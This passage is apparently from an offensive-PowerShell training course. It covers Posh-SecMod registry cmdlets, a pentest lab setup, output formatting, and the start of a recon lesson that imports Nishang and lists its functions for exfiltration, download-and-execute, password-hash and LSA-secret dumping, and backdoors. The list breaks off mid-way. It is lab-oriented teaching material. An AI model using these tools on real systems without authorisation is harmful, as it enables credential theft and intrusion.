: False IsFamily : False IsAssembly : False IsFamilyAndAssembly : False IsFamilyOrAssembly : False IsStatic : False IsFinal : False IsVirtual : False IsHideBySig : True IsAbstract : False IsSpecialName : False IsConstructor : False CustomAttributes : {[System.Security.SecuritySafeCriticalAttribute()], [__DynamicallyInvokableAttribute()]} PS C:\> ``` - [```Posh-SecMod```](https://github.com/darkoperator/Posh-SecMod) [```Registry```](https://github.com/darkoperator/Posh-SecMod/tree/master/Registry) module ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master> ls Directory: C:\Users\Administrator\Desktop\Posh-SecMod-master Mode LastWriteTime Length Name ---- ------------- ------ ---- d---- 7/9/2017 5:32 PM Assemblies d---- 7/9/2017 5:32 PM Audit d---- 7/9/2017 5:32 PM Database d---- 7/9/2017 5:32 PM Discovery d---- 7/9/2017 5:32 PM Parse d---- 7/9/2017 5:32 PM PostExploitation d---- 7/9/2017 5:32 PM Registry d---- 7/9/2017 5:32 PM Utility ----- 8/12/2015 8:31 AM 483 .gitattributes ----- 8/12/2015 8:31 AM 1970 .gitignore ----- 8/12/2015 8:31 AM 12840 LICENSE.txt ----- 8/12/2015 8:31 AM 5554 Posh-SecMod.psd1 ----- 8/12/2015 8:31 AM 751 Posh-SecMod.psm1 ----- 8/12/2015 8:31 AM 1889 README.md PS C:\Users\Administrator\Desktop\Posh-SecMod-master> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master> cd .\Registry ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ls Directory: C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry Mode LastWriteTime Length Name ---- ------------- ------ ---- ----- 8/12/2015 8:31 AM 27860 Registry.ps1 ----- 8/12/2015 8:31 AM 27864 Registry.psm1 PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Import-Module .\Registry.psm1 ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Get-Module ModuleType Version Name ExportedCommands ---------- ------- ---- ---------------- Manifest 3.1.0.0 Microsoft.PowerShell.Management {Add-Computer, Add-Content, Checkpoint-Computer, Clear-Content...} Manifest 3.1.0.0 Microsoft.PowerShell.Utility {Add-Member, Add-Type, Clear-Variable, Compare-Object...} Script 0.0 Registry {Get-RegKeys, Get-RegKeySecurityDescriptor, Get-RegValue, Get-RegValues...} PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Get-Command -Module Registry CommandType Name ModuleName ----------- ---- ---------- Function Get-RegKeys Registry Function Get-RegKeySecurityDescriptor Registry Function Get-RegValue Registry Function Get-RegValues Registry Function New-RegKey Registry Function Remove-RegKey Registry Function Remove-RegValue Registry Function Set-RegValue Registry Function Test-RegKeyAccess Registry PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Get-Help Get-RegKeys -Examples NAME Get-RegKeys SYNOPSIS Enumerates the keys that are under a given Registry Key. -------------------------- EXAMPLE 1 -------------------------- C:\PS>Listing all of the keys under HKCU\Software key PS C:\> Get-RegKeys -Hive HKCU -Key software Key FullPath --- -------- 7-Zip HKCU\software\7-Zip AppDataLow HKCU\software\AppDataLow Macromedia HKCU\software\Macromedia Microsoft HKCU\software\Microsoft Microsoft Corporation HKCU\software\Microsoft Corporation Mine HKCU\software\Mine Policies HKCU\software\Policies RegisteredApplications HKCU\software\RegisteredApplications ThinPrint HKCU\software\ThinPrint VMware, Inc. HKCU\software\VMware, Inc. Wow6432Node HKCU\software\Wow6432Node Classes HKCU\software\Classes PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Get-Help Get-RegKeySecurityDescriptor -Examples NAME Get-RegKeySecurityDescriptor SYNOPSIS Gets the Security DACL and Owner of a given Registry Key. -------------------------- EXAMPLE 1 -------------------------- C:\PS>Get the DACL for the SAM key in HKLM PS C:\> Get-RegKeySecurityDescriptor -Hive HKlm -Key sam Trustee Permission ------- ---------- BUILTIN\Administrators Owner BUILTIN\Users Read Access BUILTIN\Administrators All Access NT AUTHORITY\SYSTEM All Access \CREATOR OWNER All Access APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Read Access PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Get-Help Get-RegValue -Examples NAME Get-RegValue SYNOPSIS Retrives a the content of a specified value in a given key. -------------------------- EXAMPLE 1 -------------------------- C:\PS>Getting the Windows Version fromt the registry PS C:\> Get-RegValue -Hive HKLM -key "SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ProductName Windows 8 Enterprise -------------------------- EXAMPLE 2 -------------------------- C:\PS>Read registry binary data and turn it in to ASCII String PS C:\> $bindata = Get-RegValue -Hive HKCU -Key _deleteme -Name binval PS C:\> ([System.Text.Encoding]::ASCII).GetString($bindata) PowerShell PS C:\Wind PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Get-Help New-RegKey -Examples NAME New-RegKey SYNOPSIS Creates a registry key under a given Registry Key. -------------------------- EXAMPLE 1 -------------------------- C:\PS>Create a key named _deleteme under the registry HKCU key. PS C:\> New-RegKey -Hive HKCU -Key _deleteme -Verbose VERBOSE: Key HKCU\_deleteme was created. PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Get-Help Remove-RegKey -Examples NAME Remove-RegKey SYNOPSIS Removes a registry key under a given Registry Key. -------------------------- EXAMPLE 1 -------------------------- C:\PS>Remove a key named _deleteme under the registry HKCU key. PS C:\> Remove-RegKey -Hive HKCU -Key _deleteme -Verbose VERBOSE: Key HKCU\_deleteme was removed. PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Get-Help Remove-RegValue -Examples NAME Remove-RegValue SYNOPSIS Removes a specified value in a given key. -------------------------- EXAMPLE 1 -------------------------- C:\PS>Removing a value from the registry PS C:\> Remove-RegValue -Hive HKCU -Key _deleteme -Name dworval -Verbose VERBOSE: Value dworval has been removed. PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Get-Help Set-RegValue -Examples NAME Set-RegValue SYNOPSIS Set a value on a given key. -------------------------- EXAMPLE 1 -------------------------- C:\PS>set a SZ value. PS C:\> Set-RegValue -Hive HKCU -Key _deleteme -Name stringval -Type SZ -Data "data" -Verbose VERBOSE: Value set on HKCU\_deletme\stringval of type SZ -------------------------- EXAMPLE 2 -------------------------- C:\PS>Set a MULTISZ value. PS C:\> Set-RegValue -Hive HKCU -Key _deleteme -Name multistring -Type MULTISZ -Data "str1","str2","str3" -Verbose VERBOSE: Value set on HKCU\_deletme\multistring of type MULTISZ -------------------------- EXAMPLE 3 -------------------------- C:\PS>Set a QWORD value. PS C:\> Set-RegValue -Hive HKCU -Key _deleteme -Name qval -Type QWORD -Data 4060 -Verbose VERBOSE: Value set on HKCU\_deletme\qval of type QWORD -------------------------- EXAMPLE 4 -------------------------- C:\PS>Set a EXPANDSZ value. PS C:\> Set-RegValue -Hive HKCU -Key _deleteme -Name expanval -Type EXPANDSZ -Data "%envvar%" -Verbose VERBOSE: Value set on HKCU\_deletme\expanval of type EXPANDSZ -------------------------- EXAMPLE 5 -------------------------- C:\PS>Set a DWORD value. PS C:\> Set-RegValue -Hive HKCU -Key _deleteme -Name dworval -Type DWORD -Data 10 -Verbose VERBOSE: Value set on HKCU\_deletme\dworval of type DWORD -------------------------- EXAMPLE 6 -------------------------- C:\PS>Set a Binary value. PS C:\> Set-RegValue -Hive HKCU -Key _deleteme -Name binval -Type BINARY -Data @([char[]]'PowerShell') -Verbose VERBOSE: Value set on HKCU\_deletme\binval of type BINARY PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ```PowerShell PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> Get-Help Test-RegKeyAccess -Examples NAME Test-RegKeyAccess SYNOPSIS Checks for specific access type on a given registry key. -------------------------- EXAMPLE 1 -------------------------- PS C:\>Test-RegKeyAccess -Hive hkcu -Key software -AccessType DELETE True PS C:\Users\Administrator\Desktop\Posh-SecMod-master\Registry> ``` ###### Exercise - Try the ```Macro Security script``` from previous exercise on a remote computer. ================================================ FILE: 39-Pentest-Methodology.md ================================================ #### 39. Pentest Methodology ###### Penetration Testing is cyclic ![Image of Penetration](images/39/penmet.jpeg) ###### Lab Setup - Use (at least) a Windows Domain Controller and couple of domain member computers - Or use [Amazon’s t1.micro](http://aws.amazon.com/ec2/) Windows instances for free - Step 1 - [How to install Windows Server 2012 R2 Domain Controller (Step By Step guide)](https://www.youtube.com/watch?v=TeB7yJE2plI) ![Image of Win-2k12-R2](images/39/1.jpeg) ![Image of Win-2k12-R2](images/39/2.jpeg) ![Image of Win-2k12-R2](images/39/3.jpeg) - Step 2 - [How to Join Client to a Active Directory Domain in Windows Server 2012](https://www.youtube.com/watch?v=w8LRLkdWwc4) - [Join Windows 7 Computer to Windows Server 2008 Active Directory Domain](https://www.youtube.com/watch?v=jUUjAkjzV9U) ![Image of Win7](images/39/4.jpeg) ![Image of Win7](images/39/5.jpeg) ###### Tools Required for Offensive PowerShell - [Nishang](https://github.com/samratashok/nishang) - [PowerSploit](https://github.com/mattifestation/PowerSploit) - [PowerTools](https://github.com/Veil-Framework/PowerTools) - [Posh-SecMod](https://github.com/darkoperator/Posh-SecMod/) ================================================ FILE: 4-Output-Formatting.md ================================================ #### 4. Output Formatting ###### Output Formatting ```PowerShell PS C:\Users\Windows-32> Get-Command -CommandType cmdlet -Name Format* CommandType Name ----------- ---- Cmdlet Format-Custom Cmdlet Format-List Cmdlet Format-Table Cmdlet Format-Wide PS C:\Users\Windows-32> ``` - ```Get-ChildItem``` is similar to ```dir``` / ```ls``` ```PowerShell PS C:\Users\Windows-32> Get-ChildItem Directory: C: \ Users \ Windows-32 LastWriteTime Length Length ---- ------------- ------ ---- Dr-- 5/28/2017 11:33 AM Contacts Dr-- 7/4/2017 12:40 PM Desktop Dr-- 5/28/2017 11:33 AM Documents Dr-- 7/4/2017 1:53 PM Downloads Dr-- 5/28/2017 11:57 AM Favorites Dr-- 5/28/2017 11:33 AM Links Dr-- 5/28/2017 11:33 AM Music Dr-- 5/28/2017 11:33 AM Dr-- 5/28/2017 11:33 AM Saved Games Dr-- 5/28/2017 11:33 AM Searches Dr-- 5/28/2017 11:33 AM Videos PS C:\Users\Windows-32> ``` - ```Get-ChildItem``` with ```Format-Table``` Cmdlet ```PowerShell PS C:\Users\Windows-32> Get-ChildItem | Format-Table Directory: C: \ Users \ Windows-32 LastWriteTime Length Length ---- ------------- ------ ---- Dr-- 5/28/2017 11:33 AM Contacts Dr-- 7/4/2017 12:40 PM Desktop Dr-- 5/28/2017 11:33 AM Documents Dr-- 7/4/2017 1:53 PM Downloads Dr-- 5/28/2017 11:57 AM Favorites Dr-- 5/28/2017 11:33 AM Links Dr-- 5/28/2017 11:33 AM Music Dr-- 5/28/2017 11:33 AM Dr-- 5/28/2017 11:33 AM Saved Games Dr-- 5/28/2017 11:33 AM Searches Dr-- 5/28/2017 11:33 AM Videos PS C:\Users\Windows-32> ``` - ```Format-Table``` Cmdlet with the filter ```Name``` ```PowerShell PS C:\Users\Windows-32> Get-ChildItem | Format-Table Name name ---- contacts Desktop Documents Downloads Favorite Links Music Pictures Saved Games searches videos PS C:\Users\Windows-32> ``` - ```Format-Table``` Cmdlet with the filter ```*``` ```PowerShell PS C:\Users\Windows-32> Get-ChildItem | Format-Table * PSPath ------ Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Contacts Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Desktop Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Documents Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Downloads Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Favorites Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Links Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Music Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Pictures Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Saved Games Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Searches Microsoft.PowerShell.Core \ FileSystem :: C: \ Users \ Windows-32 \ Videos PS C:\Users\Windows-32> ``` - ```Get-ChildItem``` with ```Format-List``` Cmdlet ```PowerShell PS C:\Users\Windows-32> Get-ChildItem | Format-List Directory: C: \ Users \ Windows-32 Name: Contacts CreationTime: 5/28/2017 11:33:48 AM LastWriteTime: 5/28/2017 11:33:54 AM LastAccessTime: 5/28/2017 11:33:48 AM Name: Desktop CreationTime: 5/28/2017 11:33:45 AM LastWriteTime: 7/4/2017 12:40:43 PM LastAccessTime: 7/4/2017 12:40:43 PM Name: Documents CreationTime: 5/28/2017 11:33:45 AM LastWriteTime: 5/28/2017 11:33:54 AM LastAccessTime: 5/28/2017 11:33:54 AM Name: Downloads CreationTime: 5/28/2017 11:33:45 AM LastWriteTime: 7/4/2017 1:53:34 PM LastAccessTime: 7/4/2017 1:53:34 PM Name: Favorites CreationTime: 5/28/2017 11:33:45 AM LastWriteTime: 5/28/2017 11:57:48 AM LastAccessTime: 5/28/2017 11:57:48 AM Name: Links CreationTime: 5/28/2017 11:33:45 AM LastWriteTime: 5/28/2017 11:33:54 AM LastAccessTime: 5/28/2017 11:33:54 AM Name: Music CreationTime: 5/28/2017 11:33:45 AM LastWriteTime: 5/28/2017 11:33:54 AM LastAccessTime: 5/28/2017 11:33:54 AM Name: CreationTime: 5/28/2017 11:33:45 AM LastWriteTime: 5/28/2017 11:33:54 AM LastAccessTime: 5/28/2017 11:33:54 AM Name: Saved Games CreationTime: 5/28/2017 11:33:45 AM LastWriteTime: 5/28/2017 11:33:54 AM LastAccessTime: 5/28/2017 11:33:54 AM Name: Searches CreationTime: 5/28/2017 11:33:54 AM LastWriteTime: 5/28/2017 11:33:54 AM LastAccessTime: 5/28/2017 11:33:54 AM Name: Videos CreationTime: 5/28/2017 11:33:45 AM LastWriteTime: 5/28/2017 11:33:54 AM LastAccessTime: 5/28/2017 11:33:54 AM PS C:\Users\Windows-32> ``` - ```Get-ChildItem``` with ```Format-Wide``` Cmdlet ```PowerShell PS C:\Users\Windows-32> Get-ChildItem | Format-Wide Directory: C:\Users\Windows-32 [Contacts] [Documents] [Favorites] [Music] [Saved Games] [Videos] PS C:\Users\Windows-32> ``` ###### Output Manipulation ```PowerShell PS C:\Users\Windows-32> Get-Command -CommandType cmdlet -Name out* CommandType Name ----------- ---- Cmdlet Out-Default Cmdlet Out-File Cmdlet Out-GridView Cmdlet Out-Host Cmdlet Out-Null Cmdlet Out-Printer Cmdlet Out-String PS C:\Users\Windows-32> ``` - ```Get-Process``` with ```Out-GridView``` Cmdlet ```PowerShell PS C:\Users\Windows-32> Get-Process | Out-GridView ``` ![Image of Out-GridView](images/1.jpeg) - ```Get-Process``` with ```Out-File``` Cmdlet ```PowerShell PS C:\Users\Windows-32> Get-Process | Out-File -FilePath C:\Users\Windows-32\process.txt ``` ```PowerShell PS C:\Users\Windows-32> Get-Content .\process.txt Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName ------- ------ ----- ----- ----- ------ -- ----------- 21 2 1748 1068 27 0.01 2932 cmd 53 3 196652 198600 233 6.71 1508 conhost 53 3 872 2016 43 0.06 2988 conhost 374 5 1096 1128 29 340 csrss 290 10 1364 5240 113 384 csrss 70 3 976 1496 36 0.02 1936 dwm 759 24 24516 18864 188 2.57 988 explorer 394 30 189996 167472 478 35.60 3484 firefox 813 33 147112 141012 613 30.71 3620 firefox 0 0 0 12 0 0 Idle 60 3 2024 1060 51 0.00 1184 jusched 731 12 2948 2796 29 480 lsass 146 4 1184 1024 14 488 lsm 101 6 11280 14632 87 1.20 2752 notepad++ 735 15 77228 80980 283 4.91 2072 powershell 147 6 15172 12164 122 3188 PresentationFontCache 134 5 6372 3148 60 0.26 2244 python 641 16 19312 7924 90 1852 SearchIndexer 197 7 3852 2748 29 468 services 29 1 216 200 3 264 smss 289 9 4352 1668 55 1316 spoolsv 349 6 2640 2056 31 592 svchost 251 8 2032 2028 23 708 svchost 566 14 13356 5244 74 756 svchost 517 13 31336 29092 95 880 svchost 1084 29 15168 11728 130 920 svchost 443 17 5544 4332 46 1116 svchost 371 13 8436 3480 53 1220 svchost 307 24 8664 3660 43 1352 svchost 365 16 5180 3628 73 1452 svchost 352 23 45304 13420 206 1728 svchost 96 7 1204 520 22 1912 svchost 355 13 7972 5472 59 2568 svchost 567 0 44 112 2 4 System 184 9 6684 2940 45 0.08 1924 taskhost 115 5 1488 1796 44 656 VBoxService 141 5 1300 2400 57 0.09 1520 VBoxTray 73 5 920 204 29 376 wininit 114 4 1392 768 35 412 winlogon 419 15 8024 7256 104 728 wmpnetwk 91 4 1168 1688 53 0.03 2680 wuauclt PS C:\Users\Windows-32> ``` ###### Output Formatting and Manipulation ```PowerShell PS C:\Users\Windows-32> Get-ChildItem | Format-List * | Out-File -FilePath process2.txt ``` ```PowerShell PS C:\Users\Windows-32> Get-Content .\process2.txt PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Contacts PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Contacts PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Contacts Mode : d-r-- Name : Contacts Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Contacts Extension : CreationTime : 5/28/2017 11:33:48 AM CreationTimeUtc : 5/28/2017 6:33:48 PM LastAccessTime : 5/28/2017 11:33:48 AM LastAccessTimeUtc : 5/28/2017 6:33:48 PM LastWriteTime : 5/28/2017 11:33:54 AM LastWriteTimeUtc : 5/28/2017 6:33:54 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Desktop PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Desktop PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Desktop Mode : d-r-- Name : Desktop Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Desktop Extension : CreationTime : 5/28/2017 11:33:45 AM CreationTimeUtc : 5/28/2017 6:33:45 PM LastAccessTime : 7/4/2017 12:40:43 PM LastAccessTimeUtc : 7/4/2017 7:40:43 PM LastWriteTime : 7/4/2017 12:40:43 PM LastWriteTimeUtc : 7/4/2017 7:40:43 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Documents PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Documents PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Documents Mode : d-r-- Name : Documents Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Documents Extension : CreationTime : 5/28/2017 11:33:45 AM CreationTimeUtc : 5/28/2017 6:33:45 PM LastAccessTime : 5/28/2017 11:33:54 AM LastAccessTimeUtc : 5/28/2017 6:33:54 PM LastWriteTime : 5/28/2017 11:33:54 AM LastWriteTimeUtc : 5/28/2017 6:33:54 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Downloads PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Downloads PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Downloads Mode : d-r-- Name : Downloads Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Downloads Extension : CreationTime : 5/28/2017 11:33:45 AM CreationTimeUtc : 5/28/2017 6:33:45 PM LastAccessTime : 7/4/2017 1:53:34 PM LastAccessTimeUtc : 7/4/2017 8:53:34 PM LastWriteTime : 7/4/2017 1:53:34 PM LastWriteTimeUtc : 7/4/2017 8:53:34 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Favorites PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Favorites PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Favorites Mode : d-r-- Name : Favorites Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Favorites Extension : CreationTime : 5/28/2017 11:33:45 AM CreationTimeUtc : 5/28/2017 6:33:45 PM LastAccessTime : 5/28/2017 11:57:48 AM LastAccessTimeUtc : 5/28/2017 6:57:48 PM LastWriteTime : 5/28/2017 11:57:48 AM LastWriteTimeUtc : 5/28/2017 6:57:48 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Links PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Links PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Links Mode : d-r-- Name : Links Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Links Extension : CreationTime : 5/28/2017 11:33:45 AM CreationTimeUtc : 5/28/2017 6:33:45 PM LastAccessTime : 5/28/2017 11:33:54 AM LastAccessTimeUtc : 5/28/2017 6:33:54 PM LastWriteTime : 5/28/2017 11:33:54 AM LastWriteTimeUtc : 5/28/2017 6:33:54 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Music PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Music PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Music Mode : d-r-- Name : Music Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Music Extension : CreationTime : 5/28/2017 11:33:45 AM CreationTimeUtc : 5/28/2017 6:33:45 PM LastAccessTime : 5/28/2017 11:33:54 AM LastAccessTimeUtc : 5/28/2017 6:33:54 PM LastWriteTime : 5/28/2017 11:33:54 AM LastWriteTimeUtc : 5/28/2017 6:33:54 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Pictures PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Pictures PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Pictures Mode : d-r-- Name : Pictures Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Pictures Extension : CreationTime : 5/28/2017 11:33:45 AM CreationTimeUtc : 5/28/2017 6:33:45 PM LastAccessTime : 5/28/2017 11:33:54 AM LastAccessTimeUtc : 5/28/2017 6:33:54 PM LastWriteTime : 5/28/2017 11:33:54 AM LastWriteTimeUtc : 5/28/2017 6:33:54 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Saved Games PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Saved Games PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Saved Games Mode : d-r-- Name : Saved Games Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Saved Games Extension : CreationTime : 5/28/2017 11:33:45 AM CreationTimeUtc : 5/28/2017 6:33:45 PM LastAccessTime : 5/28/2017 11:33:54 AM LastAccessTimeUtc : 5/28/2017 6:33:54 PM LastWriteTime : 5/28/2017 11:33:54 AM LastWriteTimeUtc : 5/28/2017 6:33:54 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Searches PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Searches PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Searches Mode : d-r-- Name : Searches Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Searches Extension : CreationTime : 5/28/2017 11:33:54 AM CreationTimeUtc : 5/28/2017 6:33:54 PM LastAccessTime : 5/28/2017 11:33:54 AM LastAccessTimeUtc : 5/28/2017 6:33:54 PM LastWriteTime : 5/28/2017 11:33:54 AM LastWriteTimeUtc : 5/28/2017 6:33:54 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\Videos PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : Videos PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : True BaseName : Videos Mode : d-r-- Name : Videos Parent : Windows-32 Exists : True Root : C:\ FullName : C:\Users\Windows-32\Videos Extension : CreationTime : 5/28/2017 11:33:45 AM CreationTimeUtc : 5/28/2017 6:33:45 PM LastAccessTime : 5/28/2017 11:33:54 AM LastAccessTimeUtc : 5/28/2017 6:33:54 PM LastWriteTime : 5/28/2017 11:33:54 AM LastWriteTimeUtc : 5/28/2017 6:33:54 PM Attributes : ReadOnly, Directory PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\process.txt PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : process.txt PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : False VersionInfo : File: C:\Users\Windows-32\process.txt InternalName: OriginalFilename: FileVersion: FileDescription: Product: ProductVersion: Debug: False Patched: False PreRelease: False PrivateBuild: False SpecialBuild: False Language: BaseName : process Mode : -a--- Name : process.txt Length : 860014 DirectoryName : C:\Users\Windows-32 Directory : C:\Users\Windows-32 IsReadOnly : False Exists : True FullName : C:\Users\Windows-32\process.txt Extension : .txt CreationTime : 7/6/2017 1:43:45 PM CreationTimeUtc : 7/6/2017 8:43:45 PM LastAccessTime : 7/6/2017 1:43:45 PM LastAccessTimeUtc : 7/6/2017 8:43:45 PM LastWriteTime : 7/6/2017 1:43:45 PM LastWriteTimeUtc : 7/6/2017 8:43:45 PM Attributes : Archive PSPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32\process2.txt PSParentPath : Microsoft.PowerShell.Core\FileSystem::C:\Users\Windows-32 PSChildName : process2.txt PSDrive : C PSProvider : Microsoft.PowerShell.Core\FileSystem PSIsContainer : False VersionInfo : File: C:\Users\Windows-32\process2.txt InternalName: OriginalFilename: FileVersion: FileDescription: Product: ProductVersion: Debug: False Patched: False PreRelease: False PrivateBuild: False SpecialBuild: False Language: BaseName : process2 Mode : -a--- Name : process2.txt Length : 21562 DirectoryName : C:\Users\Windows-32 Directory : C:\Users\Windows-32 IsReadOnly : False Exists : True FullName : C:\Users\Windows-32\process2.txt Extension : .txt CreationTime : 7/6/2017 2:47:38 PM CreationTimeUtc : 7/6/2017 9:47:38 PM LastAccessTime : 7/6/2017 2:47:38 PM LastAccessTimeUtc : 7/6/2017 9:47:38 PM LastWriteTime : 7/6/2017 2:47:38 PM LastWriteTimeUtc : 7/6/2017 9:47:38 PM Attributes : Archive PS C:\Users\Windows-32> ``` ================================================ FILE: 40-Recon-and-Scanning-Part-1.md ================================================ #### 40. Recon and Scanning Part 1 ###### Recon and Scanning - Host Discovery - Port-Scan - Other Recon methods ###### [Nishang](https://github.com/samratashok/nishang) - PowerShell for penetration testing and offensive security - Import ```Nishang``` ```PowerShell PS C:\Users\Administrator> cd .\Desktop\nishang-master ``` ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Import-Module .\nishang.psm1 WARNING: The names of some imported commands from the module 'nishang' include unapproved verbs that might make them less discoverable. To find the commands with unapproved verbs, run the Import-Module command again with the Verbose parameter. For a list of approved verbs, type Get-Verb. WARNING: Some imported command names contain one or more of the following restricted characters: # , ( ) {{ }} [ ] & - / \ $ ^ ; : " ' < > | ? @ ` * % + = ~ PS C:\Users\Administrator\Desktop\nishang-master> ``` - List the ```commands``` exported by the module ```PowerShell PS C:\Users\Administrator\Desktop\nishang-master> Get-Command -Module nishang CommandType Name ModuleName ----------- ---- ---------- Function Add-Exfiltration nishang Function Add-Persistence nishang Function Add-RegBackdoor nishang Function Add-ScrnSaveBackdoor nishang Function Base64ToString nishang Function Check-VM nishang Function ConvertTo-ROT13 nishang Function Copy-VSS nishang Function Create-MultipleSessions nishang Function DNS_TXT_Pwnage nishang Function Do-Exfiltration nishang Function Download nishang Function Download_Execute nishang Function Download-Execute-PS nishang Function Enable-DuplicateToken nishang Function Execute-Command-MSSQL nishang Function Execute-DNSTXT-Code nishang Function Execute-OnTime nishang Function ExetoText nishang Function FireBuster nishang Function FireListener nishang Function Get-Information nishang Function Get-LsaSecret nishang Function Get-PassHashes nishang Function Get-PassHints nishang Function Get-Unconstrained nishang Function Get-WebCredentials nishang Function Get-Wlan-Keys nishang Function Get-WmiShellOutput nishang Function Gupt-Backdoor nishang Function 